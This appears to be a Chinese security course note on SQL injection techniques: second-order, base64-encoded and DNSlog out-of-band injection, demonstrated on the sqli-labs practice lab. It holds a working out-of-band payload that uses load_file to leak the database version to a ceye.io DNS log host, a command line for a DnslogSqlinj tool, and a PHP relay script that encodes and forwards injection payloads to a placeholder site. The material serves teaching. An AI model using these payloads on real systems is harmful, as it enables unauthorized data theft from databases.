17 WEB漏洞-二次,加解密,DNS等注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。

#加解密,二次,DNSlog注入
注入原理,演示案例,实际应用(中转注入)

DNSlog:解决了盲注不能回显数据,效率低的问题

http://127.0.0.1:8080/sqlilabs/less-2/?id=-1 and 
if((select load_file(concat('\\\\',(select 
version()),'.1t7i2f.ceye.io\\abc'))),1,0)--+
D:\Python27\python.exe dnslogSql.py -u 
"http://127.0.0.1:8080/sqlilabs/Less-9/?id=1' 
and ({})--+"

17 WEB漏洞-二次,加解密,DNS等注入_第1张图片
演示案例:
✧ sqlilabs-less21-cookie&加解密注入(实际案例)
✧ sqlilabs-less24-post登陆框&二次注入(实际案例)
✧ sqlilabs-less9-load_file&dnslog带外注入(实际案例)
✧ py-DnslogSqlinj-dnslog注入演示脚本演示(实际案例)

涉及资源:
http://ceye.io/
https://github.com/ADOOO/DnslogSqlinj


$url='http://xxxx/job_bystjb/yjs_byszjs.asp?id=';
$payload=base64_encode($_GET['x']);
echo $payload;
$urls=$url.$payload;
file_get_contents($urls);
echo $urls;
?>

你可能感兴趣的:(XD安全)